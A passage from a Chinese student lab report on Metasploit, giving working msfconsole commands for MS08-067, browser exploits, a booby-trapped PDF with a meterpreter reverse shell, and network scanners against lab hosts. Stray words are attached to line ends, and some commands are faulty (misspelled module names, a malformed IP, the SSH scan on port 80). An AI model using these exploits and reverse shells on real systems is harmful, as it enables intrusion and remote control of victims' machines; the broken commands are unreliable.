本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell
一個主動攻擊實踐:MS08-067(成功)windows
一個針對瀏覽器的攻擊:MS10_002_aurora(失敗)、browser_autpwn2(成功)、vm_1漏洞系統BodgeIt(成功且惟一)api
一個針對客戶端的攻擊:adobe_toolbutton(成功)瀏覽器
一個輔助模塊:http_vertion(成功且惟一)、ssh_vertion(成功且惟一)、arp_sweep(成功)安全
用本身的話解釋什麼是exploit,payload,encode網絡
exploit:MSF的攻擊模塊,它的功能是將payload(有效攻擊載荷)順利傳送到靶機中,分爲主動攻擊和被動攻擊兩種模式。ssh
payload:有效攻擊載荷,在靶機中實際執行的一段惡意代碼,做用通常是執行後能與攻擊的主機創建鏈接,實現遠程控制。tcp
encode:編碼模塊,可以經過不一樣的編碼方式對payload進行不一樣的編碼,僅改變payload的一些「」
外貌特徵,不影響其功能學習
採用的靶機爲:Windows XP SP3編碼
首先使用nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶機IP地址
查看靶機是否存在該漏洞
而後在攻擊機Kali的命令行中輸入msfconsole
進入控制檯
選擇ms08-067漏洞 use exploit/windows/smb/ms08_067_netapi
使用show options
查看須要設置的相關參數
設置靶機的IP set RHOSTS 192.168.1.235
選擇有關tcp的反向鏈接的payload generic/shell_reverse_tcp
設置監聽者的IPset LHOST 192.168.1.123
設置監聽的端口號set LPORT 5320
。
執行攻擊 exploit
按照上個漏洞攻擊一樣的步驟,設置相關參數:
msfconsole use exploit/windows/browser/ms10_002_aurora set payload generic/shell_reverse_tcp set LHOST 192.168.1.123 //設置kali攻擊IP, set RHOST 192.168.1.235 set SRVPORT 5320
查看相關配置,確認有無差錯
執行exploit
,生成一些URL連接
在靶機IE輸入剛剛生成的URL連接,結果出現錯誤
Kali端鏈接中斷,攻擊失敗
猜想是瀏覽器在訪問過程當中發生了一些錯誤,中斷了回連的過程,應該是瀏覽器的安全設置問題。
而後嘗試第二次攻擊:
use auxiliary/server/browser_autopwn2 set SRVHOST 192.168.56.1 set URIPATH /test
exploit
使目標瀏覽器訪問http://192.168.1.123/test
Kali虛擬機顯示攻擊成功。
第三次攻擊,惟一(vm_1漏洞系統BodgeIt)
use exploit/windows/misc/hta_server set payload windows/shell/reverse_tcp set srvport 8888 set lport 12345 run
如今切換到Windows虛擬機,打開IE瀏覽器,輸入地址
點擊運行,回連成功
進入msf模塊,使用adobe_toolbutton進行攻擊,設置相關參數
輸入如下命令,完成配置並建立PDF,打開顯示隱藏文件,並在/root/.msf4/local/目錄下找到20165320.pdf文件,以下圖所示
use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模塊 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.123 //設置kali攻擊IP, set LPORT 5320 set FILENAME 20165320.pdf
將該PDF拷到靶機上
以後進入以前的監聽模塊,依次輸入如下命令設置並監聽便可,輸入exploit後在靶機上打開pdf,回連成功
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.123 set LPORT 5320 exploit
使用http_vertion模塊可以掃描靶機的http版本號
use auxiliary/scanner/http/http_vertion set RHOST 192.168.1.157 set THREADS 10 set RPORT 80 exploit
使用ssh_vertion模塊可以掃描靶機的ssh版本號
use auxiliary/scanner/ssh/ssh_vertion set RHOST 192.1.235 set THREADS 10 set RPORT 80 exploit
使用arp_sweep 掃描網段的主機
use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.1.0/24 set THREADS 50 exploit
這一次實驗咱們熟悉了MSF的六大模塊,也弄清楚了它們具體的用法,爲咱們之後的學習打下了必定的基礎,可是也發現了許多操做系統已經修補了之前存在的漏洞,對於咱們這樣的新手來講,找到一個新的漏洞太難。